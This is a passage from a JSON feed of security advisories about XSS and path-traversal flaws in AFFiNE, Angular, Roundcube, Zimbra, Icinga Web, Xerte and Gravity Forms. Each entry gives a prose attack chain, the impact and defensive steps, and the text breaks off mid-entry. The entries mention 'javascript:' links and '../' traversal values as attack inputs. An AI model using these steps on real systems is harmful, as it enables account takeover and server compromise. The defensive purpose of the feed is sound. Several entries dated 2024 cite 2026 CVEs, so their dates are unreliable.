The exfiltration of sensitive data can lead to reputational damage and compromise of national security.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious Zimbra Webmail Activity\u003c/code\u003e to your SIEM and tune for your environment to identify unusual actions within the Zimbra webmail interface.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for unusual connections originating from Zimbra servers, which can be indicative of post-exploitation activity, using the \u003ccode\u003eDetect Zimbra Server Outbound Connections\u003c/code\u003e Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement multi-factor authentication (MFA) for all Zimbra accounts to mitigate the impact of stolen credentials.\u003c/li\u003e\n\u003cli\u003eConduct regular security audits of Zimbra installations to identify and patch any known vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-20T05:20:03Z","date_published":"2026-03-20T05:20:03Z","id":"/briefs/2026-03-ghostmail/","summary":"A Russian APT group is exploiting a Zimbra XSS vulnerability (details unspecified) to target the Ukrainian government in an operation dubbed 'GhostMail'.","title":"Operation GhostMail: Russian APT Exploiting Zimbra XSS to Target Ukraine Government","url":"https://feed.craftedsignal.io/briefs/2026-03-ghostmail/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["xss","vulnerability","affine"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA cybersecurity researcher discovered two critical XSS vulnerabilities in AFFiNE, a self-hosted alternative to Notion, which has 66k stars on GitHub. The vulnerabilities include a reflected XSS in the \u003ccode\u003e/image-proxy\u003c/code\u003e endpoint and a stored XSS vulnerability in bookmark cards. 
The \u003ccode\u003e/image-proxy\u003c/code\u003e endpoint vulnerability allows unauthenticated users to fetch arbitrary URLs and reflect the URL headers in the response, potentially leaking internal IP addresses. The stored XSS vulnerability enables attackers to insert JavaScript links within bookmark cards. The researcher reported that the AFFiNE maintainers have been unresponsive to vulnerability reports for months, despite ongoing commits to the repository, raising concerns about the security of AFFiNE users.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies an AFFiNE instance.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious URL targeting the \u003ccode\u003e/image-proxy\u003c/code\u003e endpoint with a payload designed to reflect arbitrary headers, possibly revealing internal network information.\u003c/li\u003e\n\u003cli\u003eThe attacker sends the crafted URL to a victim, or the attacker directly accesses the vulnerable endpoint if internal IP leakage is the goal.\u003c/li\u003e\n\u003cli\u003eThe AFFiNE server fetches the URL and reflects the attacker-controlled headers in the response, leading to XSS execution in the victim\u0026rsquo;s browser.\u003c/li\u003e\n\u003cli\u003eAlternatively, the attacker crafts a bookmark card containing a \u0026ldquo;javascript:\u0026rdquo; link.\u003c/li\u003e\n\u003cli\u003eThe attacker saves the malicious bookmark card within AFFiNE.\u003c/li\u003e\n\u003cli\u003eWhen a user clicks on the malicious bookmark card, the injected JavaScript code executes within their browser session, enabling further malicious actions.\u003c/li\u003e\n\u003cli\u003eThe attacker can then steal cookies, redirect the user, or perform other actions within the context of the AFFiNE application.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of the reflected XSS vulnerability can 
expose internal IP addresses of AFFiNE instances, potentially affecting all users of the self-hosted application. The stored XSS vulnerability can lead to account takeover, data theft, or further propagation of malicious content within the AFFiNE workspace. AFFiNE has 66k stars on GitHub, indicating a significant user base, making the impact potentially widespread. The affected sectors are broad, as AFFiNE is a general-purpose productivity tool.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBlock the \u003ccode\u003e/image-proxy\u003c/code\u003e endpoint at the network or proxy level as a temporary mitigation for the reflected XSS vulnerability, as suggested by the researcher.\u003c/li\u003e\n\u003cli\u003eEducate users to avoid clicking on links starting with \u0026ldquo;javascript:\u0026rdquo; in bookmark cards to prevent exploitation of the stored XSS vulnerability.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect access to the vulnerable \u003ccode\u003e/image-proxy\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect bookmark cards with suspicious JavaScript links.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-19T12:09:56Z","date_published":"2026-03-19T12:09:56Z","id":"/briefs/2026-03-affine-xss/","summary":"Two critical XSS vulnerabilities, Reflected XSS in the /image-proxy endpoint and Stored XSS in bookmark cards, were discovered in AFFiNE, a self-hosted alternative to Notion, with the vendor being unresponsive.","title":"Critical XSS Vulnerabilities in AFFiNE","url":"https://feed.craftedsignal.io/briefs/2026-03-affine-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["angular","xss","vulnerability"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA cross-site scripting (XSS) vulnerability has been identified in the Angular framework, 
specifically affecting versions prior to 22.0.0-next.3, 21.2.4, 20.3.18, and 19.2.20. The vulnerability stems from the interaction between security-sensitive attributes (e.g., href) and Angular\u0026rsquo;s internationalization features. When such an attribute is marked for translation with Angular\u0026rsquo;s \u003ccode\u003ei18n-\u0026lt;attribute\u0026gt;\u003c/code\u003e syntax (for example \u003ccode\u003ei18n-href\u003c/code\u003e), the built-in sanitization normally applied to that attribute can be bypassed. This can be exploited by injecting malicious content through data bindings that handle untrusted, user-generated data. Successful exploitation allows an attacker to execute arbitrary script within the context of the affected application\u0026rsquo;s domain. Immediate patching is strongly advised.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies an Angular application using a vulnerable version (prior to 22.0.0-next.3, 21.2.4, 20.3.18, or 19.2.20).\u003c/li\u003e\n\u003cli\u003eThe attacker locates an input field or URL parameter that allows the injection of user-controlled data into an \u003ccode\u003ehref\u003c/code\u003e attribute (or another security-sensitive attribute).\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious payload containing JavaScript code. 
Because the application\u0026rsquo;s template marks the target attribute for translation with \u003ccode\u003ei18n-\u0026lt;attribute\u0026gt;\u003c/code\u003e, the bound value escapes the sanitization Angular would otherwise apply, and the payload survives into the rendered attribute.\u003c/li\u003e\n\u003cli\u003eThe attacker injects the malicious payload into the targeted input field or URL parameter.\u003c/li\u003e\n\u003cli\u003eThe victim user interacts with the application, triggering the rendering of the malicious payload within the vulnerable attribute.\u003c/li\u003e\n\u003cli\u003eThe injected JavaScript code executes within the victim\u0026rsquo;s browser, operating under the security context of the Angular application\u0026rsquo;s domain.\u003c/li\u003e\n\u003cli\u003eThe attacker gains the ability to perform actions such as stealing session cookies or authentication tokens (session hijacking).\u003c/li\u003e\n\u003cli\u003eThe attacker can then exfiltrate sensitive data or perform unauthorized actions on behalf of the user.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this XSS vulnerability allows attackers to execute arbitrary script within the context of the vulnerable Angular application. This can lead to session hijacking, enabling attackers to impersonate users and access their data. Data exfiltration is also possible, allowing attackers to steal sensitive information such as personal data or financial details. Furthermore, attackers can perform unauthorized actions on behalf of the user, potentially leading to financial loss, reputational damage, or other adverse consequences. 
The CCB strongly recommends immediate patching.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade Angular installations to versions 22.0.0-next.3, 21.2.4, 20.3.18, or 19.2.20 to remediate the vulnerability as per the vendor advisory (\u003ca href=\"https://github.com/angular/angular/security/advisories/GHSA-g93w-mfhg-p222\"\u003ehttps://github.com/angular/angular/security/advisories/GHSA-g93w-mfhg-p222\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eImplement a Web Application Firewall (WAF) with rules to detect and block common XSS payloads. This can provide an additional layer of defense against exploitation attempts.\u003c/li\u003e\n\u003cli\u003eEnable and review web server access logs for suspicious activity and potential XSS attempts. Analyze logs for unusual URL parameters or POST data containing script-like syntax.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-17T19:19:33Z","date_published":"2026-03-17T19:19:33Z","id":"/briefs/2026-03-angular-xss/","summary":"A cross-site scripting (XSS) vulnerability exists in Angular versions prior to 22.0.0-next.3, 21.2.4, 20.3.18, and 19.2.20, allowing attackers to execute arbitrary code within the context of the vulnerable application, potentially leading to session hijacking, data exfiltration, and unauthorized actions.","title":"Angular Cross-Site Scripting (XSS) Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-03-angular-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":6.1,"id":"CVE-2024-37383"},{"cvss":6.1,"id":"CVE-2024-37384"},{"cvss":9.8,"id":"CVE-2024-37385"}],"_cs_exploited":false,"_cs_products":["Roundcube"],"_cs_severities":["medium"],"_cs_tags":["roundcube","xss","vulnerability"],"_cs_type":"advisory","_cs_vendors":["Roundcube"],"content_html":"\u003cp\u003eMultiple vulnerabilities have been identified in Roundcube, a widely used webmail solution. 
An attacker exploiting these vulnerabilities can perform cross-site scripting (XSS) attacks, potentially leading to the disclosure of sensitive information. This poses a significant risk to organizations relying on Roundcube for email communication, as successful exploitation could compromise user accounts, expose confidential emails, and enable further malicious activities within the affected environment. The CERT-Bund advisory WID-SEC-2024-1754 highlights the risk, emphasizing the need for immediate mitigation measures.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Roundcube instance.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious payload containing XSS code.\u003c/li\u003e\n\u003cli\u003eThe attacker injects the payload into a Roundcube page, possibly through a crafted email or a vulnerable input field.\u003c/li\u003e\n\u003cli\u003eA legitimate user accesses the compromised page.\u003c/li\u003e\n\u003cli\u003eThe victim\u0026rsquo;s browser executes the attacker\u0026rsquo;s XSS code.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s script steals the victim\u0026rsquo;s session cookies or other sensitive data.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials to impersonate the victim and access their email account.\u003c/li\u003e\n\u003cli\u003eThe attacker exfiltrates confidential information or performs further malicious actions, such as sending phishing emails to other users.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these Roundcube vulnerabilities can lead to severe consequences. An attacker could gain unauthorized access to user email accounts, steal sensitive information, and conduct further malicious activities, like phishing or data breaches. 
The impact includes potential financial losses, reputational damage, and legal liabilities due to compromised data. The number of affected users and organizations depends on the scale of Roundcube deployments, but the potential impact is substantial.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious Roundcube URI Activity\u003c/code\u003e to identify potential exploitation attempts in web server logs.\u003c/li\u003e\n\u003cli\u003eReview Roundcube configuration and apply security best practices to minimize the attack surface.\u003c/li\u003e\n\u003cli\u003eImplement input validation and output encoding to prevent XSS attacks.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-06-24T10:00:00Z","date_published":"2024-06-24T10:00:00Z","id":"/briefs/2024-06-roundcube-xss/","summary":"Multiple vulnerabilities in Roundcube allow an attacker to perform a cross-site scripting attack and disclose confidential information.","title":"Roundcube Vulnerabilities Leading to Cross-Site Scripting and Information Disclosure","url":"https://feed.craftedsignal.io/briefs/2024-06-roundcube-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":6.1,"id":"CVE-2025-48700"}],"_cs_exploited":false,"_cs_products":["Zimbra Collaboration Suite (ZCS)"],"_cs_severities":["medium"],"_cs_tags":["xss","vulnerability","zimbra"],"_cs_type":"advisory","_cs_vendors":["Synacor"],"content_html":"\u003cp\u003eA cross-site scripting (XSS) vulnerability, identified as CVE-2025-48700, exists within the Synacor Zimbra Collaboration Suite (ZCS). This flaw could be exploited by attackers to inject and execute arbitrary JavaScript code within a user\u0026rsquo;s web browser session when they interact with a compromised Zimbra instance. Successful exploitation could lead to the theft of session cookies, credential harvesting, or other malicious activities performed on behalf of the victim user. 
The vulnerability requires user interaction to trigger, making it essential to educate users about the risks of clicking on untrusted links or opening suspicious attachments. The scope of the vulnerability affects installations of Zimbra Collaboration Suite.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable Zimbra Collaboration Suite (ZCS) instance.\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious URL or injects malicious JavaScript into a ZCS component (e.g., email, calendar, or task).\u003c/li\u003e\n\u003cli\u003eThe attacker delivers the malicious URL or crafted item to a target user, often via phishing or social engineering.\u003c/li\u003e\n\u003cli\u003eThe user clicks on the malicious URL or interacts with the injected content within ZCS.\u003c/li\u003e\n\u003cli\u003eThe user\u0026rsquo;s browser executes the attacker-controlled JavaScript code.\u003c/li\u003e\n\u003cli\u003eThe JavaScript code steals the user\u0026rsquo;s session cookie or performs other malicious actions within the context of the user\u0026rsquo;s session.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen session cookie to hijack the user\u0026rsquo;s session and gain unauthorized access to the Zimbra account.\u003c/li\u003e\n\u003cli\u003eThe attacker accesses sensitive information, sends malicious emails, or performs other unauthorized actions on behalf of the compromised user.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this XSS vulnerability can lead to unauthorized access to sensitive information stored within the Zimbra Collaboration Suite. Attackers could potentially read emails, access contacts, steal credentials, and perform other malicious activities on behalf of the compromised user. This can result in data breaches, financial loss, and reputational damage. 
The number of potential victims depends on the number of users of the affected Zimbra instance.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply mitigations per vendor instructions to patch CVE-2025-48700 (\u003ca href=\"https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories\"\u003ehttps://wiki.zimbra.com/wiki/Zimbra_Security_Advisories\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eFollow applicable BOD 22-01 guidance for cloud services if Zimbra ZCS is deployed in a cloud environment.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Suspicious URI Parameters for Potential XSS\u0026rdquo; to identify potentially malicious requests targeting ZCS.\u003c/li\u003e\n\u003cli\u003eEducate users about the risks of clicking on untrusted links and opening suspicious attachments to prevent exploitation of the XSS vulnerability.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-24T12:00:00Z","date_published":"2024-01-24T12:00:00Z","id":"/briefs/2024-01-zimbra-xss/","summary":"A cross-site scripting (XSS) vulnerability in Synacor Zimbra Collaboration Suite (ZCS) could allow attackers to execute arbitrary JavaScript within a user's session, potentially leading to unauthorized access to sensitive information.","title":"Synacor Zimbra Collaboration Suite (ZCS) Cross-Site Scripting Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-01-zimbra-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Icinga Web","icinga-php-library"],"_cs_severities":["high"],"_cs_tags":["xss","web-application","icinga"],"_cs_type":"advisory","_cs_vendors":["Icinga"],"content_html":"\u003cp\u003eA reflected XSS vulnerability has been identified in Icinga Web, affecting the vulnerable library component in versions up to 0.13.0 (this is the version of the component distributed through \u003ccode\u003eicinga-php-library\u003c/code\u003e, not an Icinga Web 2.x release number). This vulnerability arises from the improper handling of malformed search requests, allowing an attacker to inject arbitrary JavaScript code into a victim\u0026rsquo;s browser. 
The attacker crafts a malicious URL containing the XSS payload and entices the victim to visit this URL. Upon visiting the crafted URL, the injected JavaScript code executes within the context of the Icinga Web application, potentially enabling the attacker to perform actions on behalf of the victim, steal sensitive information, or compromise the integrity of the application. The vulnerability was patched in version 0.13.1 and will be published as part of \u003ccode\u003eicinga-php-library\u003c/code\u003e version 0.19.2. Icinga Web versions 2.12.0 and later can mitigate the issue by enabling Content-Security-Policy (CSP).\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker crafts a malicious URL containing a reflected XSS payload within a malformed search request. The payload is designed to execute arbitrary JavaScript code in the victim\u0026rsquo;s browser.\u003c/li\u003e\n\u003cli\u003eThe attacker distributes the crafted URL to potential victims through various means, such as phishing emails, social engineering, or malicious websites.\u003c/li\u003e\n\u003cli\u003eThe victim clicks on the malicious URL, unknowingly initiating the XSS attack.\u003c/li\u003e\n\u003cli\u003eThe victim\u0026rsquo;s browser sends the crafted HTTP request to the Icinga Web server.\u003c/li\u003e\n\u003cli\u003eThe Icinga Web server processes the request and reflects the malicious XSS payload back to the victim\u0026rsquo;s browser in the HTTP response.\u003c/li\u003e\n\u003cli\u003eThe victim\u0026rsquo;s browser renders the HTTP response, executing the injected JavaScript code within the context of the Icinga Web application.\u003c/li\u003e\n\u003cli\u003eThe attacker can now execute arbitrary code, potentially stealing session cookies, performing actions on behalf of the user, or defacing the Icinga Web interface.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the compromised Icinga Web session to gain 
unauthorized access to sensitive data or perform malicious activities within the Icinga environment.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows an attacker to execute arbitrary JavaScript code in the context of the Icinga Web application. This can lead to session hijacking, unauthorized access to sensitive data, defacement of the Icinga Web interface, or further compromise of the Icinga infrastructure. While the exact number of victims is unknown, any organization using vulnerable versions of Icinga Web is at risk. The severity is high due to the potential for significant impact on confidentiality, integrity, and availability.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade Icinga Web to version 0.13.1 or later to patch the vulnerability. This version contains the fix for CVE-2026-42224.\u003c/li\u003e\n\u003cli\u003eFor Icinga Web versions 2.12.0 and later, enable Content-Security-Policy (CSP) in the general configuration to mitigate the risk of XSS attacks.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Icinga Web XSS Attempt via URI\u0026rdquo; to your SIEM to detect potential exploitation attempts by monitoring for suspicious URI patterns.\u003c/li\u003e\n\u003cli\u003eReview web server logs for unusual or malformed requests targeting the Icinga Web application to identify potential XSS attack attempts (webserver log source).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-24T12:00:00Z","date_published":"2024-01-24T12:00:00Z","id":"/briefs/2024-01-icinga-web-xss/","summary":"A reflected cross-site scripting (XSS) vulnerability exists in Icinga Web versions 0.13.0 and earlier, allowing attackers to inject malicious JavaScript into a victim's browser through malformed search requests, potentially leading to arbitrary code execution within the Icinga 
Web context.","title":"Icinga Web Reflected XSS Vulnerability via Malformed Search Requests","url":"https://feed.craftedsignal.io/briefs/2024-01-icinga-web-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.1,"id":"CVE-2026-34414"}],"_cs_exploited":false,"_cs_products":["Xerte Online Toolkits (\u003c= 3.15)"],"_cs_severities":["critical"],"_cs_tags":["path-traversal","remote-code-execution","xss"],"_cs_type":"advisory","_cs_vendors":["Xerte"],"content_html":"\u003cp\u003eXerte Online Toolkits, a tool used to create online learning materials, is vulnerable to a path traversal vulnerability (CVE-2026-34414) in versions 3.15 and earlier. The vulnerability exists in the elFinder connector endpoint at \u003ccode\u003e/editor/elfinder/php/connector.php\u003c/code\u003e. The \u003ccode\u003ename\u003c/code\u003e parameter within rename commands is not properly sanitized, allowing attackers to use directory traversal sequences (e.g., \u003ccode\u003e../\u003c/code\u003e) to manipulate file locations. This flaw can be exploited to overwrite application files, inject stored cross-site scripting (XSS), or, when combined with other vulnerabilities, achieve unauthenticated remote code execution (RCE). 
This poses a significant threat to organizations utilizing affected versions of Xerte Online Toolkits, potentially leading to data breaches, system compromise, and reputational damage.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a vulnerable Xerte Online Toolkits instance running version 3.15 or earlier.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request to \u003ccode\u003e/editor/elfinder/php/connector.php\u003c/code\u003e targeting the rename command.\u003c/li\u003e\n\u003cli\u003eWithin the request, the \u003ccode\u003ename\u003c/code\u003e parameter contains directory traversal sequences (e.g., \u003ccode\u003e../../\u003c/code\u003e) and the desired destination path.\u003c/li\u003e\n\u003cli\u003eThe server, due to insufficient input validation, processes the request without properly sanitizing the \u003ccode\u003ename\u003c/code\u003e parameter.\u003c/li\u003e\n\u003cli\u003eThe attacker moves a file (e.g., an uploaded image or media file) from its original project media directory to a new location specified within the malicious \u003ccode\u003ename\u003c/code\u003e parameter. This could involve moving a file to the application root directory.\u003c/li\u003e\n\u003cli\u003eIf the attacker moves a specifically crafted PHP file to the application root and the webserver is configured to execute PHP files in the root, the attacker can then access this file via a web request.\u003c/li\u003e\n\u003cli\u003eThe attacker executes arbitrary code on the server.\u003c/li\u003e\n\u003cli\u003eThe attacker gains complete control of the Xerte Online Toolkits instance and potentially the underlying server.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability can lead to several critical consequences. 
Attackers can overwrite sensitive application files, leading to denial of service or system instability. The injection of malicious JavaScript code can result in stored cross-site scripting (XSS) attacks, compromising user accounts and data. The most severe outcome is unauthenticated remote code execution (RCE), enabling attackers to gain complete control over the affected server, potentially leading to data breaches, malware deployment, and further lateral movement within the network. The CVSS v3.1 base score for this vulnerability is 7.1, indicating a high level of risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade Xerte Online Toolkits to a version greater than 3.15 to patch CVE-2026-34414.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious Path Traversal in Xerte Connector\u003c/code\u003e to identify attempted exploitation of the path traversal vulnerability by monitoring requests to \u003ccode\u003e/editor/elfinder/php/connector.php\u003c/code\u003e with directory traversal sequences.\u003c/li\u003e\n\u003cli\u003eImplement input validation and sanitization on the \u003ccode\u003ename\u003c/code\u003e parameter within the elFinder connector to prevent path traversal attacks.\u003c/li\u003e\n\u003cli\u003eReview web server configurations to prevent the execution of PHP files from the web root directory.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-xerte-path-traversal/","summary":"Xerte Online Toolkits 3.15 and earlier are vulnerable to relative path traversal, allowing attackers to move files and potentially achieve remote code execution.","title":"Xerte Online Toolkits Path Traversal 
Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-01-xerte-path-traversal/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-5110"}],"_cs_exploited":false,"_cs_products":["Gravity Forms plugin \u003c= 2.10.0"],"_cs_severities":["medium"],"_cs_tags":["xss","wordpress","gravityforms"],"_cs_type":"advisory","_cs_vendors":["WordPress"],"content_html":"\u003cp\u003eThe Gravity Forms plugin, a widely used WordPress plugin, is susceptible to an unauthenticated stored cross-site scripting (XSS) vulnerability. This flaw, identified as CVE-2026-5110, affects versions up to and including 2.10.0. The vulnerability stems from inadequate input validation and output escaping specifically within the SingleProduct field when it is nested inside a Repeater field. This bypasses normal state validation, allowing attackers to inject malicious HTML and JavaScript into the product name field. The injected payload is then stored unsanitized in the database. This vulnerability allows unauthenticated attackers to inject arbitrary web scripts that execute whenever an administrator accesses an entry containing the malicious payload through the WordPress admin interface.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn unauthenticated attacker crafts a malicious request to a WordPress endpoint utilizing the Gravity Forms plugin.\u003c/li\u003e\n\u003cli\u003eThe attacker injects arbitrary HTML and JavaScript into the \u0026lsquo;product name\u0026rsquo; field (input .1) of a SingleProduct field nested within a Repeater field.\u003c/li\u003e\n\u003cli\u003eDue to insufficient validation within the \u003ccode\u003evalidate_subfield()\u003c/code\u003e method, the malicious input bypasses the state validation mechanism \u003ccode\u003e(failed_state_validation())\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003esanitize_entry_value()\u003c/code\u003e method returns the raw, unsanitized value 
because HTML is not expected for the affected field type.\u003c/li\u003e\n\u003cli\u003eThe malicious input is stored in the WordPress database without proper sanitization or escaping.\u003c/li\u003e\n\u003cli\u003eAn administrator accesses the Gravity Forms entries page in the WordPress admin interface (wp-admin/admin.php?page=gf_entries).\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eget_value_entry_detail()\u003c/code\u003e method retrieves the malicious product name from the database and outputs it without proper escaping.\u003c/li\u003e\n\u003cli\u003eThe stored XSS payload executes in the administrator\u0026rsquo;s browser, potentially allowing the attacker to perform actions with the administrator\u0026rsquo;s privileges.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows an unauthenticated attacker to execute arbitrary JavaScript code in the context of an administrator\u0026rsquo;s browser session. This can lead to account compromise, data theft, or further malicious activities within the WordPress administration panel. 
The vulnerability affects all users of the Gravity Forms plugin on WordPress installations with versions up to and including 2.10.0.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the Gravity Forms plugin to the latest version (greater than 2.10.0) to patch CVE-2026-5110.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule \u003ccode\u003eDetect Gravity Forms XSS Attempt\u003c/code\u003e to identify potential exploitation attempts by monitoring for specific patterns in HTTP requests.\u003c/li\u003e\n\u003cli\u003eEnable web server logging to capture detailed information about HTTP requests and responses, enabling the Sigma rule\u0026rsquo;s effectiveness.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-gravity-forms-xss/","summary":"The Gravity Forms plugin for WordPress is vulnerable to unauthenticated stored cross-site scripting (XSS) in versions up to 2.10.0, allowing attackers to inject arbitrary JavaScript code into the product name field within repeater fields, which executes when an administrator views the affected entry.","title":"Gravity Forms Plugin Unauthenticated Stored XSS Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-01-gravity-forms-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-5112"}],"_cs_exploited":false,"_cs_products":["Gravity Forms plugin"],"_cs_severities":["medium"],"_cs_tags":["xss","wordpress","gravityforms"],"_cs_type":"advisory","_cs_vendors":["WordPress"],"content_html":"\u003cp\u003eThe Gravity Forms plugin for WordPress, a widely used form management tool, contains a vulnerability that can be exploited by unauthenticated attackers. 
Specifically, versions up to and including 2.10.0 are susceptible to Stored Cross-Site Scripting (XSS) due to insufficient input validation and output escaping of Calculation Product field names within Repeater fields. This flaw resides in how the plugin processes and renders form submissions containing malicious HTML within the product name field. The vulnerability allows an attacker to inject arbitrary web scripts that execute in the context of an authenticated administrator\u0026rsquo;s session when they access the entry detail page within the WordPress admin panel. Successful exploitation enables attackers to perform actions with the privileges of the compromised administrator.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn unauthenticated attacker crafts a malicious form submission.\u003c/li\u003e\n\u003cli\u003eThe malicious payload is placed in the Calculation Product field\u0026rsquo;s product name (.1) within a Repeater field.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003evalidate()\u003c/code\u003e method in the \u003ccode\u003eGF_Field_Calculation\u003c/code\u003e class inadequately validates the product name field, failing to sanitize malicious HTML.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003esanitize_entry_value()\u003c/code\u003e method returns the raw, unsanitized value for the product name field, as HTML sanitization is not expected for this field.\u003c/li\u003e\n\u003cli\u003eThe malicious form submission is saved as an entry in WordPress.\u003c/li\u003e\n\u003cli\u003eAn authenticated administrator with the \u003ccode\u003egravityforms_view_entries\u003c/code\u003e capability accesses the entry detail page in \u003ccode\u003ewp-admin\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eget_value_entry_detail()\u003c/code\u003e method concatenates the unsanitized product name directly into the output string.\u003c/li\u003e\n\u003cli\u003eThe 
